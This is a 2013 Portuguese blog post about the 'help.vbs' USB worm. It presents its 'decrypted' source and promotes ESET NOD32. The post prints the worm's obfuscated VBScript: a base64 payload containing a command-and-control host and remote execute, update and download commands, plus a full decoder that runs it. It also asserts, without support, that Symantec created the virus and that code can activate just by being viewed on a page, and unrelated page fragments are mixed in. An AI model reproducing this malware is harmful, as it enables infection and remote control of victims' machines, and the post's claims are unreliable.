Quais são os melhores Desenhos/Animes na sua opinião? (What are the best Animes in your opinion?)

quinta-feira, 1 de agosto de 2013

Vírus HELP.VBS é decifrado! - GProduções e ESET Nod32

A Equipe da CybernetcSecurity (da GProduções) em parceria com a equipe ESET (NOD32) decifraram o vírus mais falado do BRASIL!

O "help.vbs"!

Esse vírus tem a função de transformar arquivos do Pendrive em ATALHOS ocultando os arquivos originais!

E ainda deixa o PC mais lento, infecta arquivos do SISTEMA do Windows, e tempos depois de infectado o PC e/ou pendrive o vírus APAGA os arquivos originais deixando somente os ATALHOS!




Nós suspeitamos que esse vírus tenha sido criado pela SYMANTEC (NORTON) já que foi o 1º antivírus a detectar o "HELP.VBS" e o NORTON ainda dizia que apagava o vírus, quando na verdade o renomeava e o deixava ativo!

O AVAST realmente foi o primeiro ANTIVIRUS GRATIS a detectar o "HELP.VBS" e o apagava de verdade porém não tem a função de restaurar os arquivos apagados ou ocultados; tendo em vista que o HELP.VBS não trabalha sozinho.

HELP.VBS é um vírus (malware) e ele trabalha com "bactérias" ("worms") que são PIORES que "trojans" (o tipo mais simples e menos nocivo de vírus cibernético).




(na foto: NOD32 [ESET])



Quando o AVAST ou outro antivirus gratis como AVIRA ANTIVIR detectavam e APAGAVAM o malware HELP.VBS esses antivirus deixavam as "bactérias" (os WORMS) 'escaparem', ou seja, tudo continuava infectado e os arquivos ainda seriam contaminados, ocultados e posteriormente excluidos (tudo isso automaticamente e nenhum antivirus gratis ou pago conseguiram apagar esses WORMS), deixando como única solução FORMATAR o PC e pendrives OU comprar um Norton Antivirus!

Sim, pois, com muitas pesquisas, a ESET é o 1º e único antivírus que consegue remover completamente o malware e worm HELP.vbs; isso a ESET conseguiu com a ajuda da GProduções que decifrou a codificação e comandos do HELP.vbs!


CONFIRA as linhas de comando do HELP.vbs  (não tenha medo, como é só texto e não um executável, seu PC/pendrive não irão sofrer danos ao você ler ou ver as linhas de comando desse vírus!)



E não se esqueça, ESET é a melhor opção em ANTIVIRUS!






















(na foto: NOD32 [ESET])







Em todas as linhas foi adicionado TRAVESSÕES no INÍCIO e FIM caso contrário o Virus seria ativado nesta página.

Também foi escrito outras coisas no meio como PRIMEIRA PARTE e etc. para evitar que o vírus seja ativado, pois o HELP.VBS pode ser ativado mesmo ao ser olhado em sites se os códigos estiverem continuamente ORGANIZADOS.

Confira agora as linhas de comando do virus HELP.vbs:

ANTES DO INICIAL:
_____'< -Safa7_22 Crypter- >_______________
_____Safa7_22 =_______________
_____deCrypt("Jz0tPS09LT0tPSBjb25maWcgPS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09DQoNCmhvc3QgPSAicGVudGVyMnNpZ24ubm8taXAuYml6Ig0KcG9ydCA9IDE4ODgNCmluc3RhbGxkaXIgPSAiJWFwcGRhdGElIg0KDQonPFsgY29kZWQgYnkgbmogXT4gfCA8WyBtb2RpZmllciA6IGhvdWRpbmkgXT4NCg0KJz0tPS09LT0tPSBwdWJsaWMgdmFyID0tPS09LT0tPS09LT0tPS09LT0tPS09DQoNCmRpbSBzaGVsbG9iaiANCnNldCBzaGVsbG9iaiA9IHdzY3JpcHQuY3JlYXRlb2JqZWN0KCJ3c2NyaXB0LnNoZWxsIikNCmRpbSBmaWxlc3lzdGVtb2JqDQpzZXQgZmlsZXN5c3RlbW9iaiA9IGNyZWF0ZW9iamVjdCgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKQ0KZGltIGh0dHBvYmoNCnNldCBodHRwb2JqID0gY3JlYXRlb2JqZWN0KCJtc3htbDIueG1saHR0cCIpDQoNCg0KJz0tPS09LT0tPSBwcml2YXQgdmFyID0tPS09LT0tPS09LT0tPS09LT0tPS09DQoNCmluc3RhbGxuYW1lID0gd3NjcmlwdC5zY3JpcHRuYW1lDQpzdGFydHVwID0gc2hlbGxvYmouc3BlY2lhbGZvbGRlcnMgKCJzdGFydHVwIikgJiAiXCINCmluc3RhbGxkaXIgPSBzaGVsbG9iai5leHBhbmRlbnZpcm9ubWVudHN0cmluZ3MoaW5zdGFsbGRpcikgJiAiXCINCmlmIG5vdCBmaWxlc3lzdGVtb2JqLmZvbGRlcmV4aXN0cyhpbnN0YWxsZGlyKSB0aGVuICBpbnN0YWxsZGlyID0gc2hlbGxvYmouZXhwYW5kZW52aXJvbm1lbnRzdHJpbmdzKCIldGVtcCUiKSAmICJcIg0Kc3BsaXRlciA9ICI8fD4iDQpzbGVlcCA9IDUwMDAgDQpkaW0gcmVzcG9uc2UNCmRpbSBjbWQNCmRpbSBwYXJhbQ0KaW5mbyA9ICIiDQp1c2JzcHJlYWRpbmcgPSAiIg0KZGltIG9uZW9uY2UNCg0KJz0tPS09LT0tPSBjb2RlIHN0YXJ0ID0tPS09LT0tPS09LT0tPS09LT0tPS09DQpvbiBlcnJvciByZXN1bWUgbmV4dA0KDQoNCmluc3RhbmNlDQp3aGlsZSB0cnVlDQoNCmluc3RhbGwNCg0KcmVzcG9uc2UgPSAiIg0KcmVzcG9uc2UgPSBwb3N0ICgiaXMtcmVhZHkiLCIiKQ0KY21kID0gc3BsaXQgKHJlc3BvbnNlLHNwbGl0ZXIpDQpzZWxlY3QgY2FzZSBjbWQgKDApDQpjYXNlICJleGNlY3V0ZSINCiAgICAgIHBhcmFtID0gY21kICgxKQ0KICAgICAgZXhlY3V0ZSBwYXJhbQ0KY2FzZSAidXBkYXRlIg0KICAgICAgcGFyYW0gPSBjbWQgKDEpDQogICAgICBvbmVvbmNlLmNsb3NlDQogICAgICBzZXQgb25lb25jZSA9ICBmaWxlc3lzdGVtb2JqLm9wZW50ZXh0ZmlsZSAoaW5zdGFsbGRpciAmIGluc3RhbGxuYW1lICwyLCBmYWxzZSkNCiAgICAgIG9uZW9uY2Uud3JpdGUgcGFyYW0NCiAgICAgIG9uZW9uY2UuY2xvc2UNCiAgICAgIHNoZWxsb2JqLnJ1biAid3NjcmlwdC5leGUgLy9CICIgJiBjaHIoMzQpICYgaW5zdGFsbGRpciAmIGluc3RhbGxuYW1lICYgQ2hyKDM0KQ0KICAgICAgd3NjcmlwdC5xdWl0IA0KY2FzZSAidW5pbnN0YWxsIg0KICAgICAgdW5pbnN0YWxsDQpDYXNlICJzZW5kIg0KICAgICAgcGFyYW0gPSBjbWQgKDEpDQogICAgICBkb3dubG9hZCAocGFyYW0pDQplbmQgc2VsZWN0DQoNCndzY3JpcHQuc2xlZXAgc2xlZXANCg0Kd2VuZA0KDQoNCnN1YiBpbnN0YWxsDQpvbiBlcnJvciByZXN1bWUgbmV4dA0KZGltIGxua29iag0KZGltIGZpbGVuYW1lDQpkaW0gZmlsZWljb24NCg0KdXBzdGFydA0KZm9yIGVhY2ggZHJpdmUgaW4gZmlsZXN5c3RlbW9iai5kcml2ZXMNCg0KaWYgIGRyaXZlLmlzcmVhZHkgPSB0cnVlIHRoZW4NCmlmICBkcml2ZS5mcmVlc3BhY2Ug
FIM do ANTES DO INICIAL

INICIAL:
")_______________
_____EXECUTEGLOBAL (Safa7_22)_______________
_____function deCrypt(data)_______________
FIM DO INICIAL

PRIMEIRA PARTE:
_____     deCrypt=decodeBase64(data)_______________
_____end function
_____Function decodeBase64(ByVal base64String)_______________
_____     Const Base64 = ____________________"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"_______________
_____     Dim dataLength, sOut, groupBegin_______________
_____    
_____     base64String = Replace(base64String, vbCrLf, "")_______________
_____     base64String = Replace(base64String, vbTab, "")_______________
_____     base64String = Replace(base64String, " ", "")_______________
_____     dataLength = Len(base64String)_______________
_____     If dataLength Mod 4 <> 0 Then_______________
_____          Err.Raise 1, "Base64Decode", "Bad Base64 string."_______________
_____          Exit Function_______________
_____     End If_______________
_____     For groupBegin = 1 To dataLength Step 4_______________
_____          Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut_______________
_____          numDataBytes = 3_______________
_____          nGroup = 0_______________
_____         
_____          For CharCounter = 0 To 3_______________
FIM DA PRIMEIRA PARTE

SEGUNDA PARTE:
_____               thisChar = Mid(base64String, groupBegin + CharCounter, 1)_______________
_____              
_____               If thisChar = "=" Then_______________
_____                    numDataBytes = numDataBytes - 1_______________
_____                    thisData = 0
_____               Else_______________
_____                    thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1_______________
_____               End If_______________
_____    
_____               If thisData = -1 Then_______________
_____                    Err.Raise 2, "Base64Decode", "Bad character In Base64 string."_______________
_____                    Exit Function_______________
_____               End If_______________
_____              
_____               nGroup = 64 * nGroup + thisData_______________
_____          Next_______________
_____          nGroup = Hex(nGroup)_______________
FIM DA SEGUNDA PARTE

TERCEIRA PARTE:
_____          nGroup = String(6 - Len(nGroup), "0") & nGroup_______________
_____          pOut =      Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _     _______________
_____                    Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _     _______________
_____                    Chr(CByte("&H" & Mid(nGroup, 5, 2)))_______________
_____          sOut = sOut & Left(pOut, numDataBytes)_______________
_____     Next_______________
__________decodeBase64 = sOut_______________
_______________End Function_______________

FIM DA TERCEIRA PARTE

Without accent.Western names can not be written in Kanji or Hiragana only in Katakana!